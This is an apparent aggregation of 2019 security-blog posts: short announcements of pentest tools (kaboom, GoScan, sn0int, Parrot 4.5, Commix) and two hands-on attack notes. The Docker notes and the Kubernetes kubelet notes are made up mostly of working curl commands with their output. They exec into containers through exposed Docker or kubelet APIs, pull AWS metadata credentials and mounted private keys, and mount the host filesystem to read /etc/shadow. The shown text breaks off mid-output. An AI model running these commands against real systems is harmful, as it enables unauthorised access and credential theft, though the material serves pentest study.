Kaboom – Automatic Pentest

kaboom is a script that automates the penetration test. It performs several tasks for each phase of pentest:Information gathering [nmap-unicornscan] TCP scanUDP scanVulnerability assessment [nmap-nikto-dirb-searchsploit-msfconsole]It tests several services: smbsshsnmpsmtpftptftpms-sqlmysqlrdphttphttpsand more…It finds the CVEs and then searchs them on exploit-db or Metasploit db. Exploitation [hydra] brute force sshUsagekaboom supports two mode:Interactive mode:kaboom [ENTER] …and the script does the restNON-interactive mode:kaboom <nic> <target_ip> [-s or –shutdown]If you use the shutdown option, kaboom will shutdown the machine at the end of tasks.If you want see this help:kaboom -h (or –help)Directory Hierarchykaboom saves the results of commands in this way:Download Kaboom

Link: http://www.kitploit.com/2019/02/kaboom-automatic-pentest.html

Goscan – Interactive Network Scanner

GoScan is an interactive network scanner client, featuring auto-completion, which provides abstraction and automation over nmap.Although it started as a small side-project I developed in order to learn @golang, GoScan can now be used to perform host discovery, port scanning, and service enumeration not only in situations where being stealthy is not a priority and time is limited (think at CTFs, OSCP, exams, etc.), but also (with a few tweaks in its configuration) during professional engagements.GoScan is also particularly suited for unstable environments (think unreliable network connectivity, lack of “screen", etc.), given that it fires scans and maintain their state in an SQLite database. Scans run in the background (detached from the main thread), so even if connection to the box running GoScan is lost, results can be uploaded asynchronously (more on this below). That is, data can be imported into GoScan at different stages of the process, without the need to restart the entire process from scratch if something goes wrong.In addition, the Service Enumeration phase integrates a collection of other tools (e.g., EyeWitness, Hydra, nikto, etc.), each one tailored to target a specific service. InstallationBinary installation (Recommended)Binaries are available from the Release page.# Linux (64bit)$ wget https://github.com/marco-lancini/goscan/releases/download/v2.1/goscan_2.1_linux_amd64.zip$ unzip goscan_2.1_linux_amd64.zip# Linux (32bit)$ wget https://github.com/marco-lancini/goscan/releases/download/v2.1/goscan_2.1_linux_386.zip$ unzip goscan_2.1_linux_386.zip# After that, place the executable in your PATH$ chmod +x goscan$ sudo mv ./goscan /usr/local/bin/goscanBuild from source$ git clone https://github.com/marco-lancini/goscan.git$ cd goscan/goscan/$ make setup$ make buildTo create a multi-platform binary, use the cross command via make:$ make crossDocker$ git clone https://github.com/marco-lancini/goscan.git$ cd goscan/$ docker-compose up –buildUsageGoScan supports all the main steps of network enumeration: Step Commands 1. Load targets Add a single target via the CLI (must be a /32): load target SINGLE Upload multiple targets from a text file or folder: load target MULTI <path-to-file> 2. Host Discovery Perform a Ping Sweep: sweep <TYPE> <TARGET>Or load results from a previous discovery:Add a single alive host via the CLI (must be a /32): load alive SINGLE <IP>Upload multiple alive hosts from a text file or folder: load alive MULTI <path-to-file> 3. Port Scanning Perform a port scan: portscan <TYPE> <TARGET>Or upload nmap results from XML files or folder: load portscan <path-to-file> 4. Service Enumeration Dry Run (only show commands, without performing them): enumerate <TYPE> DRY <TARGET>Perform enumeration of detected services: enumerate <TYPE> <POLITE/AGGRESSIVE> <TARGET> 5. Special Scans EyeWitnessTake screenshots of websites, RDP services, and open VNC servers (KALI ONLY): special eyewitnessEyeWitness.py needs to be in the system pathExtract (Windows) domain information from enumeration dataspecial domain <users/hosts/servers>DNSEnumerate DNS (nmap, dnsrecon, dnsenum): special dns DISCOVERY <domain>Bruteforce DNS: special dns BRUTEFORCE <domain>Reverse Bruteforce DNS: special dns BRUTEFORCE_REVERSE <domain> <base_IP> Utils Show results: show <targets/hosts/portsChange the output folder (by default ~/goscan): set output_folder <PATH>Modify the default nmap switches: set nmap_switches <SWEEP/TCP_FULL/TCP_STANDARD/TCP_VULN/UDP_STANDARD> <SWITCHES>Modify the default wordlists: set_wordlists <FINGER_USER/FTP_USER/…> <PATH> External IntegrationsThe Service Enumeration phase currently supports the following integrations: WHAT INTEGRATION ARP nmap DNS nmapdnsrecondnsenumhost FINGER nmapfinger-user-enum FTP nmapftp-user-enumhydra [AGGRESSIVE] HTTP nmapniktodirbEyeWitnesssqlmap [AGGRESSIVE]fimap [AGGRESSIVE] RDP nmapEyeWitness SMB nmapenum4linuxnbtscansamrdump SMTP nmapsmtp-user-enum SNMP nmapsnmpcheckonesixtyonesnmpwalk SSH hydra [AGGRESSIVE] SQL nmap VNC EyeWitness Download Goscan

Link: http://feedproxy.google.com/~r/PentestTools/~3/uz1Ra9_76sE/goscan-interactive-network-scanner.html

Abusing Docker API | Socket

Notes on abusing open Docker socketsThis wont cover breaking out of docker containersPorts: usually 2375 & 2376 but can be anythingRefs:https://blog.sourcerer.io/a-crash-course-on-docker-learn-to-swim-with-the-big-fish-6ff25e8958b0https://www.slideshare.net/BorgHan/hacking-docker-the-easy-wayhttps://blog.secureideas.com/2018/05/escaping-the-whale-things-you-probably-shouldnt-do-with-docker-part-1.htmlhttps://blog.secureideas.com/2018/08/escaping-the-whale-things-you-probably-shouldnt-do-with-docker-part-2.htmlhttps://infoslack.com/devops/exploring-docker-remote-apihttps://www.blackhat.com/docs/us-17/thursday/us-17-Cherny-Well-That-Escalated-Quickly-How-Abusing-The-Docker-API-Led-To-Remote-Code-Execution-Same-Origin-Bypass-And-Persistence_wp.pdfhttps://raesene.github.io/blog/2016/03/06/The-Dangers-Of-Docker.sock/https://cert.litnet.lt/2016/11/owning-system-through-an-exposed-docker-engine/https://medium.com/@riccardo.ancarani94/attacking-docker-exposed-api-3e01ffc3c124https://www.exploit-db.com/exploits/42356https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/docker_daemon_tcp.rbhttp://blog.nibblesec.org/2014/09/abusing-dockers-remote-apis.htmlhttps://www.prodefence.org/knock-knock-docker-will-you-let-me-in-open-api-abuse-in-docker-containers/https://blog.ropnop.com/plundering-docker-images/Enable docker socket (Create practice locations)https://success.docker.com/article/how-do-i-enable-the-remote-api-for-dockerdHaving the docker API | socket exposed is essentially granting root to any of the containers on the systemThe daemon listens on unix:///var/run/docker.sock but you can bind Docker to another host/port or a Unix socket.The docker socket  is the socket the Docker daemon listens on by default and it can be used to communicate with the daemon from within a container, or if configured, outside the container against the host running docker.All the docker socket magic is happening via the docker API. For example if we wanted to spin up an nginx container we’d do the below:Create a nginx containerThe following command uses curl to send the {“Image”:”nginx”} payload to the /containers/create endpoint of the Docker daemon through the unix socket. This will create a container based on Nginx and return its ID.$ curl -XPOST –unix-socket /var/run/docker.sock -d ‘{“Image":"nginx"}’ -H ‘Content-Type: application/json’ http://localhost/containers/create{"Id":"fcb65c6147efb862d5ea3a2ef20e793c52f0fafa3eb04e4292cb4784c5777d65","Warnings":null}Start the container $ curl -XPOST –unix-socket /var/run/docker.sock http://localhost/containers/fcb65c6147efb862d5ea3a2ef20e793c52f0fafa3eb04e4292cb4784c5777d65/startAs mentioned above you can also have the docker socket listen on a TCP portYou can validate it’s docker by hitting it with a version request $ curl -s http://open.docker.socket:2375/version | jq{  "Version": "1.13.1",  "ApiVersion": "1.26",  "MinAPIVersion": "1.12",  "GitCommit": "07f3374/1.13.1",  "GoVersion": "go1.9.4",  "Os": "linux",  "Arch": "amd64",  "KernelVersion": "3.10.0-514.26.2.el7.x86_64",  "BuildTime": "2018-12-07T16:13:51.683697055+00:00",  "PkgVersion": "docker-1.13.1-88.git07f3374.el7.centos.x86_64"} or with the docker clientdocker -H  open.docker.socket:2375 version Server: Engine:  Version:          1.13.1  API version:      1.26 (minimum version 1.12)  Go version:       go1.9.4  Git commit:       07f3374/1.13.1  Built:            Fri Dec  7 16:13:51 2018  OS/Arch:          linux/amd64  Experimental:     falseThis is basically a shell into the containerGet a list of running containers with the ps commanddocker -H  open.docker.socket:2375 psCONTAINER ID        IMAGE                                               COMMAND                  CREATED             STATUS              PORTS                                           NAMES72cd30d28e5c        gogs/gogs                                           "/app/gogs/docker/st…"   5 days ago          Up 5 days           0.0.0.0:3000->3000/tcp, 0.0.0.0:10022->22/tcp   gogsb522a9034b30        jdk1.8                                              "/bin/bash"              5 days ago          Up 5 days                                                           myjdk80f5947860c17        centos/mysql-57-centos7                             "container-entrypoin…"   8 days ago          Up 8 days           0.0.0.0:3306->3306/tcp                          mysql3965c004c7a7        192.168.32.134:5000/tensquare_config:1.0-SNAPSHOT   "java -jar /app.jar"     8 days ago          Up 8 days           0.0.0.0:12000->12000/tcp                        config3f466b754971        42cb59080921                                        "/bin/bash"              8 days ago          Up 8 days                                                           jdk86499013fdc2d        registry                                            "/entrypoint.sh /etc…"   8 days ago          Up 8 days           0.0.0.0:5000->5000/tcp                          registryExec into one of the containersdocker -H  open.docker.socket:2375 exec -it mysql /bin/bashbash-4.2$ whoamimysqlOther commandsAre there some stopped containers?docker -H open.docker.socket:2375 ps -aWhat are the images pulled on the host machine?docker -H open.docker.socket:2375 imagesI’ve frequently not been able to get the docker client to work well when it comes to the exec command but you can still code exec in the container with the API.  The example below is using curl to interact with the API over https (if enabled). to create and exec job, set up the variable to receive the out put and then start the exec so you can get the output.Using curl to hit the APISometimes you’ll see 2376 up for the TLS endpoint.  I haven’t been able to connect to it with the docker client but you can with curl no problem to hit the docker API.Docker socket to metadata URLhttps://docs.docker.com/engine/api/v1.37/#operation/ContainerExecBelow is an example of hitting the internal AWS metadata URL and getting the outputlist containers:curl –insecure https://tls-opendocker.socker:2376/containers/json | jq [  {    "Id": "f9cecac404b01a67e38c6b4111050c86bbb53d375f9cca38fa73ec28cc92c668",    "Names": [      "/docker_snip_1"    ],    "Image": "dotnetify",    "ImageID": "sha256:23b66a91f928ea6a49bce1be4eabedbafd41c5dfa4e76c1a94062590e54550ca",    "Command": "cmd /S /C ‘dotnet netify-temp.dll’",    "Created": 1541018555,    "Ports": [      {        "IP": "0.0.0.0",        "PrivatePort": 443,        "PublicPort": 50278,—SNIP—List processes in a container:curl –insecure https://tls-opendocker.socker:2376/containers/f9cecac404b01a67e38c6b4111050c86bbb53d375f9cca38fa73ec28cc92c668/top | jq  {  "Processes": [    [      "smss.exe",      "7868",      "00:00:00.062",      "225.3kB"    ],    [      "csrss.exe",      "10980",      "00:00:00.859",      "421.9kB"    ],    [      "wininit.exe",      "10536",      "00:00:00.078",      "606.2kB"    ],    [      "services.exe",      "10768",      "00:00:00.687",      "1.208MB"    ],    [      "lsass.exe",      "10416",      "00:00:36.000",      "4.325MB"    ], —SNIP—Set up and exec job to hit the metadata URL:curl –insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/containers/blissful_engelbart/exec -d ‘{ "AttachStdin": false, "AttachStdout": true, "AttachStderr": true, "Cmd": ["/bin/sh", "-c", "wget -qO- http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance"]}'{"Id":"4353567ff39966c4d231e936ffe612dbb06e1b7dd68a676ae1f0a9c9c0662d55"}Get the output:curl –insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/exec/4353567ff39966c4d231e936ffe612dbb06e1b7dd68a676ae1f0a9c9c0662d55/start -d ‘{}'{  "Code" : "Success",  "LastUpdated" : "2019-01-29T20:12:58Z",  "Type" : "AWS-HMAC",  "AccessKeyId" : "ASIATRSNIP",  "SecretAccessKey" : "CD6/h/egYHmYUSNIPSNIPSNIPSNIPSNIP",  "Token" : "FQoGZXIvYXdzEB4aDCQSM0rRV/SNIPSNIPSNIP",  "Expiration" : "2019-01-30T02:43:34Z"} Docker secrets relevant reading https://docs.docker.com/engine/swarm/secrets/ list secrets (no secrets/swarm not set up) curl -s –insecure https://tls-opendocker.socket:2376/secrets | jq { "message": "This node is not a swarm manager. Use \"docker swarm init\" or \"docker swarm join\" to connect this node to swarm and try again."} list secrets (they exist) $ curl -s –insecure https://tls-opendocker.socket:2376/secrets | jq [  {    "ID": "9h3useaicj3tr465ejg2koud5",    "Version": {      "Index": 21    },    "CreatedAt": "2018-07-06T10:19:50.677702428Z",    "UpdatedAt": "2018-07-06T10:19:50.677702428Z",    "Spec": {      "Name": "registry-key.key",      "Labels": {} }},Check what is mountedcurl –insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/containers/e280bd8c8feaa1f2c82cabbfa16b823f4dd42583035390a00ae4dce44ffc7439/exec -d ‘{ "AttachStdin": false, "AttachStdout": true, "AttachStderr": true, "Cmd": ["/bin/sh", "-c", "mount"]}’ {"Id":"7fe5c7d9c2c56c2b2e6c6a1efe1c757a6da1cd045d9b328ea9512101f72e43aa"}Get the output by starting the execcurl –insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/exec/7fe5c7d9c2c56c2b2e6c6a1efe1c757a6da1cd045d9b328ea9512101f72e43aa/start -d ‘{}’overlay on / type overlay proc on /proc type proc (rw,nosuid,nodev,noexec,relatime)tmpfs on /dev type tmpfs (rw,nosuid,size=65536k,mode=755)devpts on /dev/pts type devpts (rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=666)sysfs on /sys type sysfs (ro,nosuid,nodev,noexec,relatime)—SNIP—mqueue on /dev/mqueue type mqueue (rw,nosuid,nodev,noexec,relatime)/dev/sda2 on /etc/resolv.conf type ext4 (rw,relatime,errors=remount-ro,data=ordered)/dev/sda2 on /etc/hostname type ext4 (rw,relatime,errors=remount-ro,data=ordered)/dev/sda2 on /etc/hosts type ext4 (rw,relatime,errors=remount-ro,data=ordered)shm on /dev/shm type tmpfs (rw,nosuid,nodev,noexec,relatime,size=65536k)/dev/sda2 on /var/lib/registry type ext4 (rw,relatime,errors=remount-ro,data=ordered)tmpfs on /run/secrets/registry-cert.crt type tmpfs (ro,relatime)tmpfs on /run/secrets/htpasswd type tmpfs (ro,relatime)tmpfs on /run/secrets/registry-key.key type tmpfs (ro,relatime)—SNIP—Cat the mounted secretcurl –insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/containers/e280bd8c8feaa1f2c82cabbfa16b823f4dd42583035390a00ae4dce44ffc7439/exec -d ‘{ "AttachStdin": false, "AttachStdout": true, "AttachStderr": true, "Cmd": ["/bin/sh", "-c", "cat /run/secrets/registry-key.key"]}’ {"Id":"3a11aeaf81b7f343e7f4ddabb409ad1eb6024141a2cfd409e5e56b4f221a7c30"} curl –insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/exec/3a11aeaf81b7f343e7f4ddabb409ad1eb6024141a2cfd409e5e56b4f221a7c30/start -d ‘{}’ —–BEGIN RSA PRIVATE KEY—–MIIJKAIBAAKCAgEA1A/ptrezfxUlupPgKd/kAki4UlKSfMGVjD6GnJyqS0ySHiz0—SNIP—If you have secrets, it’s also worth checking out services in case they are adding secrets via environment variables curl -s –insecure https://tls-opendocker.socket:2376/services | jq [{    "ID": "amxjs243dzmlc8vgukxdsx57y",    "Version": {      "Index": 6417    },    "CreatedAt": "2018-04-16T19:51:20.489851317Z",    "UpdatedAt": "2018-12-07T13:44:36.6869673Z",    "Spec": {      "Name": "app_REMOVED",      "Labels": {},      "TaskTemplate": {        "ContainerSpec": {          "Image": "dpage/pgadmin4:latest@sha256:5b8631d35db5514d173ad2051e6fc6761b4be6c666105f968894509c5255c739",          "Env": [            "PGADMIN_DEFAULT_EMAIL=REMOVED            "PGADMIN_DEFAULT_PASSWORD=REMOVED"          ],          "Isolation": "default" Creating a container that has mounted the host file systemcurl –insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket2376/containers/create?name=test -d ‘{"Image":"alpine", "Cmd":["/usr/bin/tail", "-f", "1234", "/dev/null"], "Binds": [ "/:/mnt" ], "Privileged": true}'{"Id":"0f7b010f8db33e6abcfd5595fa2a38afd960a3690f2010282117b72b08e3e192","Warnings":null}curl –insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/containers/0f7b010f8db33e6abcfd5595fa2a38afd960a3690f2010282117b72b08e3e192/start?name=testRead something from the hostcurl –insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/containers/0f7b010f8db33e6abcfd5595fa2a38afd960a3690f2010282117b72b08e3e192/exec -d ‘{ "AttachStdin": false, "AttachStdout": true, "AttachStderr": true, "Cmd": ["/bin/sh", "-c", "cat /mnt/etc/shadow"]}'{"Id":"140e09471b157aa222a5c8783028524540ab5a55713cbfcb195e6d5e9d8079c6"}curl –insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/exec/140e09471b157aa222a5c8783028524540ab5a55713cbfcb195e6d5e9d8079c6/start -d ‘{}’root:$6$THEPASSWORDHASHWUZHERE:17717:0:99999:7:::daemon:*:17001:0:99999:7:::bin:*:17001:0:99999:7:::sys:*:17001:0:99999:7:::sync:*:17001:0:99999:7:::games:*:17001:0:99999:7:::CleanupStop the containercurl –insecure -vv -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/containers/0f7b010f8db33e6abcfd5595fa2a38afd960a3690f2010282117b72b08e3e192/stopdelete stopped containerscurl –insecure -vv -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/containers/prune

Link: http://carnal0wnage.attackresearch.com/2019/02/abusing-docker-api-socket.html

Sn0Int – Semi-automatic OSINT Framework And Package Manager

sn0int is a semi-automatic OSINT framework and package manager. It was built for IT security professionals and bug hunters to gather intelligence about a given target or about yourself. sn0int is enumerating attack surface by semi-automatically processing public information and mapping the results in a unified format for followup investigations.Among other things, sn0int is currently able to:Harvest subdomains from certificate transparency logsHarvest subdomains from various passive dns logsSift through subdomain results for publicly accessible websitesHarvest emails from pgp keyserversEnrich ip addresses with ASN and geoip infoHarvest subdomains from the wayback machineGather information about phonenumbersBruteforce interesting urlssn0int is heavily inspired by recon-ng and maltego, but remains more flexible and is fully opensource. None of the investigations listed above are hardcoded in the source, instead those are provided by modules that are executed in a sandbox. You can easily extend sn0int by writing your own modules and share them with other users by publishing them to the sn0int registry. This allows you to ship updates for your modules on your own since you don’t need to send a pull request.Join on IRC: irc.hackint.org:6697/#sn0intGetting startedInstallation ArchlinuxDebian/Ubuntu/KaliAlpineDockerOpenBSDMac OSXWindowsRunning your first investigation Installing the default modulesAdding something to scopeRunning a moduleRunning followup modules on the resultsUnscoping entitiesScripting Write your first modulePublish your moduleDatabase db_adddb_updatedb_selectKeyring Managing the keyringUsing access keys in scriptsUsing access keys as source argumentConfiguration Configuring a proxySandbox LinuxOpenBSDIPC ProtocolLimitationsFunction reference clear_errdb_adddb_selectdb_updatednserrorasn_lookupgeoip_lookuphtml_selecthtml_select_listhttp_mksessionhttp_requesthttp_sendinfojson_decodejson_decode_streamjson_encodekeyringlast_errpgp_pubkeypgp_pubkey_armoredprintpsl_domain_from_dns_nameregex_findregex_find_allsleepstatusstdin_readlineurl_decodeurl_encodeurl_escapeurl_joinurl_parseurl_unescapeutf8_decodex509_parse_pemDownload Sn0Int

Link: http://www.kitploit.com/2019/01/sn0int-semi-automatic-osint-framework.html

Parrot Security 4.5 – Security GNU/Linux Distribution Designed with Cloud Pentesting and IoT Security in Mind

Parrot 4.5 is officially released, and there are some major changes under the hood, powered by the long-term supported Linux 4.19 kernel series, preparing the project for the upcoming Parrot 5.0 LTS release. For future releases, Parrot Security plans to a support two kernels, stable kernel and a testing kernel.Parrot 4.5 also comes with the latest Metasploit 5.0 penetration testing framework, which introduces major features like new evasion modules, a new search engine, a json-rpc daemon, integrated web services, and support for writting shellcode in C.This release improves the metapackages for developers,  making it a lot easier to set up an advanced development environment for multiple frameworks and programming languages. These include parrot-devel, parrot-devel-tools, and parrot-devel-extra.Parrot 4.5 drops support for 32-bit computersOn the other side, Parrot 4.5 is the first release of the ethical hacking operating system to no longer ship with installation or live images for older, 32-bit only computers. With this, Parrot joins the growing trend of GNU/Linux distributions dropping 32-bit images. However, the developers noted the fact that they will continue to support the 32-bit architecture with updates through the official software repositories for existing users.Better Dev ToolsThere are updates in metapackages for developers, and setting up an advanced development environment for several programming languages and frameworks is now easier than ever:parrot-develIt is pre-installed in Parrot 4.5 and provides the following tools:vscodium – an advanced and extensible text editor.zeal – an offline documentation downloader and browser.git-cola – a graphic client to GIT.meld – a graphic patch inspector.tora – a graphic database frontend compatible with several database backends.These packages are included in the metapackage by using the “Recommends” apt directive, and they can be removed individually without triggering the removal of the whole parrot-devel metapackage.The metapackage also recommends the installation of parrot-devel-tools.sudo apt updatesudo apt install parrot-develparrot-devel-toolsIt is recommended by parrot-devel and pre-installed in Parrot Security. It provides some useful compilers and interpreters for the most used languages and provides the following packages:GCC/G++ – a compiler collection for C, C++ and other languages.python3 – the cpython interpreter for the python 3.6 and 3.7 language.ruby – the official ruby lang interpreter and basic toolkit (includes irb and ri as well).The package also recommends the following packages, that can be safely removed without triggering the removal of the entire parrot-devel-tools metapackage:default-jdk – the latest Java OpenJDK distribution for Java 11 (both JDK and JRE).cython3 – a compiler for the cython language, a strongly-typed dialect of python for efficient code.rust/cargo – the rust compiler and devel tools and its package management system.valac – the vala c compiler.mono-devel – the development tools for the MONO framework, an open source implementation of .net.mono-runtime – the runtime of the MONO framework compatible and interoperable with the latest .net runtime.php-cli – the PHP 7.3 language plus its command line interface and some useful core libraries.perl6 – the PERL 6 interpreter and core libraries.sudo apt updatesudo apt install parrot-devel-tools parrot-devel-extraThe parrot-devel-extra metapackage is a quick way to install many additional development utilities like advanced IDEs, additional languages, debuggers and extra tools.golang – go language compiler and runtimenodejs – node.js frameworknpm – node.js package manageratom – advanced and extensible editor by githubqtcreator – powerful C, C++ and Qt/QML IDE and debugger.kdevelop – advanced general purpose IDE by KDE.edb-debugger – graphical debugger.jad – Java decompiler.nasm – powerful general purpose x86 assembler.radare2 – advanced command line hexadecimal editor.cmake – cross-platform, open-source make system.valgrind – nstrumentation framework for building dynamic analysis tools.devscripts/build-essential – useful development utilities for debian developers/maintainers.sudo apt updatesudo apt install parrot-devel-extraDownload Parrot Security 4.5

Link: http://feedproxy.google.com/~r/PentestTools/~3/xXnhQTKJewU/parrot-security-45-security-gnulinux.html

Commix v2.7 – Automated All-in-One OS Command Injection And Exploitation Tool

Commix (short for [comm]and [i]njection e[x]ploiter) is an automated tool written by Anastasios Stasinopoulos (@ancst) that can be used from web developers, penetration testers or even security researchers in order to test web-based applications with the view to find bugs, errors or vulnerabilities related to command injection attacks. By using this tool, it is very easy to find and exploit a command injection vulnerability in a certain vulnerable parameter or HTTP header.RequirementsPython version 2.6.x or 2.7.x is required for running this program.InstallationDownload commix by cloning the Git repository:git clone https://github.com/commixproject/commix.git commixCommix comes packaged on the official repositories of the following Linux distributions, so you can use the package manager to install it!ArchStrikeBlackArch LinuxBackBoxKali LinuxParrot Security OSWeakerthan LinuxCommix also comes as a plugin, on the following penetration testing frameworks:TrustedSec’s Penetration Testers Framework (PTF)OWASP Offensive Web Testing Framework (OWTF)CTF-ToolsPentestBoxPenBoxKatoolinAptive’s Penetration Testing toolsHomebrew Tap – Pen Test Tools Supported PlatformsLinuxMac OS XWindows (experimental)UsageTo get a list of all options and switches use:python commix.py -hQ: Where can I check all the available options and switches?A: Check the ‘usage’ wiki page.Usage ExamplesQ: Can I get some basic ideas on how to use commix?A: Just go and check the ‘usage examples’ wiki page, where there are several test cases and attack scenarios.Upload ShellsQ: How easily can I upload web-shells on a target host via commix?A: Commix enables you to upload web-shells (e.g metasploit PHP meterpreter) easily on target host. For more, check the ‘upload shells’ wiki page.Modules DevelopmentQ: Do you want to increase the capabilities of the commix tool and/or to adapt it to our needs?A: You can easily develop and import our own modules. For more, check the ‘module development’ wiki page.Command Injection TestbedsQ: How can I test or evaluate the exploitation abilities of commix?A: Check the ‘command injection testbeds’ wiki page which includes a collection of pwnable web applications and/or VMs (that include web applications) vulnerable to command injection attacks.Exploitation DemosQ: Is there a place where I can check for demos of commix?A: If you want to see a collection of demos, about the exploitation abilities of commix, take a look at the ‘exploitation demos’ wiki page.Bugs and EnhancementsQ: I found a bug / I have to suggest a new feature! What can I do?A: For bug reports or enhancements, please open an issue here.Presentations and White PapersQ: Is there a place where I can find presentations and/or white papers regarding commix?A: For presentations and/or white papers published in conferences, check the ‘presentations’ wiki page.Download Commix

Link: http://feedproxy.google.com/~r/PentestTools/~3/mjOk7rQhp2Y/commix-v27-automated-all-in-one-os.html

Kubernetes: unauth kublet API 10250 basic code exec

Unauth API access (10250)Most Kubernetes deployments provide authentication for this port. But it’s still possible to expose it inadvertently and it’s still pretty common to find it exposed via the “insecure API service" option.Everybody who has access to the service kubelet port (10250), even without a certificate, can execute any command inside the container.# /run/%namespace%/%pod_name%/%container_name%example:$ curl -k -XPOST "https://k8s-node-1:10250/run/kube-system/node-exporter-iuwg7/node-exporter" -d "cmd=ls -la /"total 12drwxr-xr-x   13 root     root           148 Aug 26 11:31 .drwxr-xr-x   13 root     root           148 Aug 26 11:31 ..-rwxr-xr-x    1 root     root             0 Aug 26 11:31 .dockerenvdrwxr-xr-x    2 root     root          8192 May  5 22:22 bindrwxr-xr-x    5 root     root           380 Aug 26 11:31 devdrwxr-xr-x    3 root     root           135 Aug 26 11:31 etcdrwxr-xr-x    2 nobody   nogroup          6 Mar 18 16:38 homedrwxr-xr-x    2 root     root             6 Apr 23 11:17 libdr-xr-xr-x  353 root     root             0 Aug 26 07:14 procdrwxr-xr-x    2 root     root             6 Mar 18 16:38 rootdr-xr-xr-x   13 root     root             0 Aug 26 15:12 sysdrwxrwxrwt    2 root     root             6 Mar 18 16:38 tmpdrwxr-xr-x    4 root     root            31 Apr 23 11:17 usrdrwxr-xr-x    5 root     root            41 Aug 26 11:31 varHere is how to get all secrets which container uses (environment variables – commons to see kublet tokens here):$ curl -k -XPOST "https://k8s-node-1:10250/run/kube-system/The list of all pods and containers which were scheduled on the Kubernetes worker node could be retrieved using command below:$ curl -sk https://k8s-node-1:10250/runningpods/ | python -mjson.toolor$ curl –insecure  https://k8s-node-1:10250/runningpods | jqExample 1:curl –insecure  https://1.2.3.4:10250/runningpods | jqOutput:Forbidden (user=system:anonymous, verb=create, resource=nodes, subresource=proxy)Example 2:curl –insecure  https://1.2.3.4:10250/runningpods | jqOutput:UnauthorizedExample 3:curl –insecure  https://1.2.3.4:10250/runningpods | jqOutput:{  "kind": "PodList",  "apiVersion": "v1",  "metadata": {},  "items": [    {      "metadata": {        "name": "kube-dns-5b8bf6c4f4-k5n2g",        "generateName": "kube-dns-5b8bf6c4f4-",        "namespace": "kube-system",        "selfLink": "/api/v1/namespaces/kube-system/pods/kube-dns-5b8bf6c4f4-k5n2g",        "uid": "63438841-e43c-11e8-a104-42010a80038e",        "resourceVersion": "85366060",        "creationTimestamp": "2018-11-09T16:27:44Z",        "labels": {          "k8s-app": "kube-dns",          "pod-template-hash": "1646927090"        },        "annotations": {          "kubernetes.io/config.seen": "2018-11-09T16:27:44.990071791Z",          "kubernetes.io/config.source": "api",          "scheduler.alpha.kubernetes.io/critical-pod": ""        },        "ownerReferences": [          {            "apiVersion": "extensions/v1beta1",            "kind": "ReplicaSet",            "name": "kube-dns-5b8bf6c4f4",            "uid": "633db9d4-e43c-11e8-a104-42010a80038e",            "controller": true          }        ]      },      "spec": {        "volumes": [          {            "name": "kube-dns-config",            "configMap": {              "name": "kube-dns",              "defaultMode": 420            }          },          {            "name": "kube-dns-token-xznw5",            "secret": {              "secretName": "kube-dns-token-xznw5",              "defaultMode": 420            }          }        ],        "containers": [          {            "name": "dnsmasq",            "image": "gcr.io/google-containers/k8s-dns-dnsmasq-nanny-amd64:1.14.10",            "args": [              "-v=2",              "-logtostderr",              "-configDir=/etc/k8s/dns/dnsmasq-nanny",              "-restartDnsmasq=true",              "–",              "-k",              "–cache-size=1000",              "–no-negcache",              "–log-facility=-",              "–server=/cluster.local/127.0.0.1#10053",              "–server=/in-addr.arpa/127.0.0.1#10053",              "–server=/ip6.arpa/127.0.0.1#10053"            ],            "ports": [              {                "name": "dns",                "containerPort": 53,                "protocol": "UDP"              },              {                "name": "dns-tcp",                "containerPort": 53,                "protocol": "TCP"              }            ],            "resources": {              "requests": {                "cpu": "150m",                "memory": "20Mi"              }            },            "volumeMounts": [              {                "name": "kube-dns-config",                "mountPath": "/etc/k8s/dns/dnsmasq-nanny"              },              {                "name": "kube-dns-token-xznw5",                "readOnly": true,                "mountPath": "/var/run/secrets/kubernetes.io/serviceaccount"              }            ],            "livenessProbe": {              "httpGet": {                "path": "/healthcheck/dnsmasq",                "port": 10054,                "scheme": "HTTP"              },              "initialDelaySeconds": 60,              "timeoutSeconds": 5,              "periodSeconds": 10,              "successThreshold": 1,              "failureThreshold": 5            },            "terminationMessagePath": "/dev/termination-log",            "imagePullPolicy": "IfNotPresent"          },        ——–SNIP———With the output of the running pods command you can craft your command to do the code exec$ curl -k -XPOST "https://k8s-node-1:10250/run/as an example:leaves you with:curl -k -XPOST "https://kube-node-here:10250/run/kube-system/kube-dns-5b8bf6c4f4-k5n2g/dnsmasq" -d "cmd=ls -la /"total 35264drwxr-xr-x    1 root     root          4096 Nov  9 16:27 .drwxr-xr-x    1 root     root          4096 Nov  9 16:27 ..-rwxr-xr-x    1 root     root             0 Nov  9 16:27 .dockerenvdrwxr-xr-x    2 root     root          4096 Nov  9 16:27 bindrwxr-xr-x    5 root     root           380 Nov  9 16:27 dev-rwxr-xr-x    1 root     root      36047205 Apr 13  2018 dnsmasq-nannydrwxr-xr-x    1 root     root          4096 Nov  9 16:27 etcdrwxr-xr-x    2 root     root          4096 Jan  9  2018 homedrwxr-xr-x    5 root     root          4096 Nov  9 16:27 libdrwxr-xr-x    5 root     root          4096 Nov  9 16:27 mediadrwxr-xr-x    2 root     root          4096 Jan  9  2018 mntdr-xr-xr-x  125 root     root             0 Nov  9 16:27 procdrwx——    2 root     root          4096 Jan  9  2018 rootdrwxr-xr-x    2 root     root          4096 Jan  9  2018 rundrwxr-xr-x    2 root     root          4096 Nov  9 16:27 sbindrwxr-xr-x    2 root     root          4096 Jan  9  2018 srvdr-xr-xr-x   12 root     root             0 Nov  9 16:27 sysdrwxrwxrwt    1 root     root          4096 Nov  9 17:00 tmpdrwxr-xr-x    7 root     root          4096 Nov  9 16:27 usrdrwxr-xr-x    1 root     root          4096 Nov 